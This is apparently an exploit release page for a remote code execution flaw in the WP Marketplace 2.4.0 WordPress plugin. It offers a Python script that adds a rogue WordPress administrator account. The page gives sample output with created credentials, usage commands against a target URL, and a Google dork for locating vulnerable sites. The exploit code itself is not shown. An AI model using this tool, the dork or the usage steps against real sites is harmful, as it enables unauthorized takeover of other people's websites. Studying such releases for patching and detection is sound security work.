WP Marketplace 2.4.0 Remote Code Execution (Add WP Admin)

WP Marketplace

    ___ ___               __                                         
   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.           
   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|           
   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|           
   |:      |                |__|                                     
   |::.|:. |                                                         
    `--- ---'                                                         
       ___ ___            __          __         __                  
      |   Y   .---.-.----|  |--.-----|  |_.-----|  .---.-.----.-----.
      |.      |  _  |   _|    <|  -__|   _|  _  |  |  _  |  __|  -__|
      |. \_/  |___._|__| |__|__|_____|____|   __|__|___._|____|_____|
      |:  |   |                           |__|                       
      |::.|:. |                                                      
       `--- ---'                                                      
                                                          WP Marketplace
                                                      R3m0t3 C0d3 Ex3cut10n
                                                         (Add WP Admin)
                                                             v2.4.0

                               Written by:

                             Claudio Viviani

                          http://www.homelab.it

                             info@homelab.it
                         homelabit@protonmail.ch

                   https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[+] Tryng to connect to: http://127.0.0.1
[!] Account Added
[!] Location: http://127.0.0.1/wp-login.php
[!] Username: yna5gM
[!] Password: Fq2Y7X

Google Dork

index of "wpmarketplace"

Download

         wp_marketplace_240_add_admin.py
         wp_marketplace_240_add_admin.py (mirror)

Usage

claudio@backbox3:~$ python wp_marketplace_240_add_admin.py -t http[s]://localhost[:PORT]
                    python wp_marketplace_240_add_admin.py -t http[s]://localhost[:PORT]/basedir